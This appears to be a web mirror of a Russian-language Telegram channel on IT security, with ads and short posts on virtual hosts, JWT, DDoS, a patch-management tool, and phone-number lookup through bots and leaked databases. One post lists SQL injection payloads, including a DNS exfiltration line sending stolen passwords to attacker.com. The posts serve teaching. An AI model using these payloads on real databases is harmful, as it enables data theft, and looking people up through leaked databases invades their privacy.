Tech Lab (@dikejd) — Telegram-канал | Telegram Dialogs
Все каналы
Tech Lab

Tech Lab

@dikejd

6K подписчиков технологии 💬 Комментарии открыты

Ваша личная лаборатория по изучению всего IT и инструментов по кибер безопасности. По peклaме: @Diggsale

Последние публикации

Tech Lab
15.07.2026 11:05 · 👁 471
⚡️Надежный VPN за 1р⚡️ 🔥Что вы получаете? 🔥 ♾Безлимитный трафик на обход белых списков 🆓Пробный период 5 дней за 1 рубль ⚡️Стабильное соединение и быстрые сервера 📺 В подписке до 5 устройств, включая TV 😂Подключение за 30 секунд ✅Включили - и можно не выключать. Просто пользуетесь интернетом так, как привыкли ➡️Подключиться за 30 секунд: @giont_vpn_bot
Tech Lab
22.06.2026 11:50 · 👁 1.2K
Tech Lab | Чат | #мемы
Tech Lab
22.06.2026 09:01 · 👁 1.1K
В России можно посещать IT-мероприятия хоть каждый день: как оффлайн, так и онлайн Но где их находить? Как узнавать о них раньше, чем когда все начнут выкладывать фотографии оттуда? Переходите на канал IT-Мероприятия России. В нём каждый день анонсируются мероприятия со всех городов России 📆 в канале размещаются как онлайн, так и оффлайн мероприятия; 👩‍💻 можно найти ивенты по любому стеку: программирование, frontend-backend разработка, кибербезопасность, дата-аналитика, osint, devops и другие; 🎙 разнообразные форматы мероприятий: митапы с коллегами по цеху, конференции и вебинары с известными опытными специалистами, форумы и олимпиады от важных представителей индустрии и многое другое А чтобы не искать по разным форумам и чатам новости о предстоящих ивентах: 🚀 IT-мероприятия России — подписывайся и будь в курсе всех предстоящих мероприятий!
Tech Lab
20.06.2026 20:44 · 👁 1.2K
🌐 Виртуальные хосты — «невидимые» сайты на одном сервере. Как их настраивают, находят и взламывают. Представьте одно здание с разными входами. Так работает веб-сервер с виртуальными хостами: на одном IP и порту живут несколько независимых сайтов. Ваш blog.com и shop.com могут физически быть на одной машине. 🔍 Три способа их различить: 🟢По имени (самый частый) — сервер смотрит на заголовок Host: в запросе и отдаёт нужный сайт. 🟢По IP-адресу — у каждого виртуального хоста свой уникальный IP на одном сервере. 🟢По порту — например, site.com:8080 и site.com:9000 (неудобно для пользователей). 🏢 Особый случай: локальные сети В корпоративных сетях часто используют внутренние DNS-имена, которых нет в публичном интернете: ⚫️files.corp — файловое хранилище ⚫️wiki.internal — база знаний ⚫️monitor.local — панель мониторинга Эти ресурсы доступны только изнутри сети. Пользователи даже не задумываются, что обращаются к виртуальным хостам. В следующем посте разберём практический пример с командной строкой. Tech Lab
Tech Lab
12.05.2026 09:31 · 👁 2K
🔑 JWT: Цифровой паспорт в мире Web, который можно подделать Когда вы входите в приложение, вам часто выдают не обычную куку, а JSON Web Token (JWT) — компактный и самодостаточный токен, который содержит всю информацию о сессии прямо внутри себя. 🤔 Зачем нужен JWT и как он устроен? JWT создан для статусlessness — серверу не нужно хранить сессию в памяти. Он просто проверяет подпись токена и верит данным внутри. Токен состоит из трёх частей, разделённых точками: Header.Payload.Signature 🔵Header (Заголовок): Обычно {"alg": "HS256", "typ": "JWT"}. Указывает алгоритм подписи (HS256, RS256, none) и тип. 🔵Payload (Полезная нагрузка): JSON-объект с утверждениями (claims). Например: {"sub": "user123", "name": "Vasya", "admin": false, "iat": 1516239022}. 🔵Signature (Подпись): Криптографическая подпись, которая гарантирует, что токен не был изменён. Создаётся путём хеширования base64UrlEncode(header) + "." + base64UrlEncode(payload) с использованием секретного ключа (для HS256) или приватного ключа (для RS256). Пример токена: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c 🛡Как защититься? Основные правила 🔵Никогда не доверяйте alg из токена. Жёстко задавайте алгоритм проверки на сервере. 🔵Всегда проверяйте подпись перед чтением payload. 🔵Используйте сложные, случайные секретные ключи для HS256. 🔵Проверяйте все claims в payload: iss (issuer), aud (audience), exp (expiration time). Не используйте none в продакшене. 🔵Храните приватные ключи в безопасности, публичные ключи — в доверенных источниках. 🔵Валидируйте параметр kid, запрещая пути и URL. 💎 Итог: JWT — мощный и удобный стандарт, но его «самодостаточность» — палка о двух концах. Одна ошибка в реализации (доверие заголовку, слабый ключ) превращает цифровой паспорт в легкоподделываемую бумажку, открывая дверь к полному захвату учётной записи. Tech Lab | Чат | #Основы
Tech Lab
10.05.2026 09:25 · 👁 1.9K
🤿 ТВОЯ ПРИВАТНОСТЬ МЕРТВА. Я ПОКАЖУ, КАК ЕЁ ВОСКРЕСИТЬ 📹Первоисточник Tech Lab | Чат |  #Видео
Tech Lab
03.05.2026 10:10 · 👁 2.5K
👁 Пробив по номеру в Telegram Вокруг пробива по телефону в Telegram много мифов, но механика проста: мессенджер показывает совпадения из своей адресной книги и даёт боту доступ ровно к тому, что пользователь сам не закрыл в настройках.Поэтому часть «поиска» — это не магия, а правильно собранные источники. Сегодня такие инструменты комбинируют несколько вещей: 📌 проверку номера через ботов-агрегаторов; 📌 сопоставление по аватару, username и следам в открытых чатах; 📌 поиск по слитым базам и OSINT-каталогам. Если настройки приватности слабые — о тебе можно узнать больше, чем ты думаешь. 👉 Полное руководство Tech Lab | Чат | #Cтатьи
Tech Lab
30.04.2026 14:33 · 👁 2.2K
💡 SQL-инъекция: От UNION до кражи данных через DNS Все знают ' OR '1'='1, но SQLi — это целый спектр техник. Разберём эволюцию от классики до скрытых атак. 🔍 1. UNION-based — когда результат виден Работает, если данные из запроса выводятся на страницу (список пользователей, посты). Позволяет "дописать" свой запрос к оригинальному и увидеть результат. ' UNION SELECT username, password FROM users-- Суть: Крадём данные напрямую из интерфейса. 🎭 2. Blind (Слепая) — когда результат не виден Приложение не показывает данные, но его поведение меняется. Атакующий задаёт вопросы "да/нет": ' AND (SELECT SUBSTRING(password,1,1) FROM users)='a'-- Если условие верно — страница загружается нормально, если нет — с ошибкой или пустая. Так посимвольно угадываем пароли. ⏱️ 3. Time-based — слепая, но с таймером Разновидность слепой, где ответ — это задержка. ' AND IF((SELECT password) LIKE 'a%', SLEEP(5), 0)-- Если первый символ пароля — a, сервер "заснёт" на 5 секунд. Долгий ответ = угадали. 🌐 4. Out-of-band (DNS-экфильтрация) — хитрый обход Когда ничто не помогает, заставляем саму базу данных отправить нам данные. Через DNS-запрос. sql ' UNION SELECT LOAD_FILE('\\\\'(SELECT password)'.attacker.com\\test')-- Как работает: 🔵СУБД пытается прочитать "файл" по пути \\<украденный_пароль>.attacker.com\test. 🔵Для этого она делает DNS-запрос к домену attacker.com. 🔵В логах DNS-сервера злоумышленник видит полный запрос: <украденный_пароль>.attacker.com. 🔵Данные украдены. 💎 Итог: 🔵UNION — если виден вывод. 🔵Blind — если есть косвенная реакция. 🔵DNS-атака — когда другие методы бессильны, но можно выполнить произвольный запрос. 🔵Защита — не только фильтрация кавычек, а параметризованные запросы, минимальные права БД и мониторинг DNS. Tech Lab | Чат | #Основы
Tech Lab
29.04.2026 13:23 · 👁 1.6K
💣 DDoS-атаки — когда сервис валят толпой DDoS — логичное продолжение DoS, но уже на другом уровне. Если DoS — это один источник, то DDoS — это тысячи и миллионы узлов, которые одновременно давят цель, пока она не перестаёт отвечать. Что важно знать: 📌 Что это такое: 🔴DDoS (Distributed Denial of Service) — распределённая атака, при которой трафик идёт сразу с множества источников: ботнетов, заражённых серверов, IoT-устройств. 📌 Как выглядит: 🔴Запросы летят с тысяч IP из разных стран, сетей и ASN. 🔴В логах это выглядит как «нормальный» трафик, но в ненормальных объёмах. 📌 Почему сложнее защищаться: 🔴Блокировка одного IP не решает ничего. 🔴Нужно фильтровать по поведению, протоколам, типам запросов, а иногда резать целые регионы и подсети. 📌 Какие бывают: 🔴 volumetric — забивают канал (Gbps/Tbps); 🔴 protocol — ломают стек (SYN, UDP, ICMP); 🔴 application-layer — бьют по HTTP/API, имитируя живых пользователей. 📌 Где бьёт больнее всего: 🎯 онлайн-сервисы, банки, игры, маркетплейсы, госресурсы, API без rate-limit. Короче говоря 🗣:DDoS — это не «сломать», а утопить сервис в трафике. Код может быть идеальным, но без защиты инфраструктура ляжет первой. Tech Lab | Чат | #Виды атак
Tech Lab
12.04.2026 11:04 · 👁 2.3K
🛡 PatchMon: централизованное управление обновлениями в серверных средах Инструмент для админов и Blue Team, который позволяет безопасно и централизованно управлять обновлениями на разных серверах. Агенты обмениваются данными с сервером PatchMon только по исходящим каналам — не нужно открывать порты и рисковать. Что умеет: ➡️Централизованное управление патчами на множестве серверов ➡️Агенты работают через исходящие соединения (без открытых портов) ➡️Полная видимость состояния обновлений ➡️Безопасная автоматизация процессов 🔗 GitHub: PatchMon/PatchMon VPN за 1₽ | Tech Lab | Чат | #Инструменты
Чат поддержки
Ответим здесь же, обычно быстро
Здравствуйте! Напишите ваш вопрос — оператор ответит в этом чате.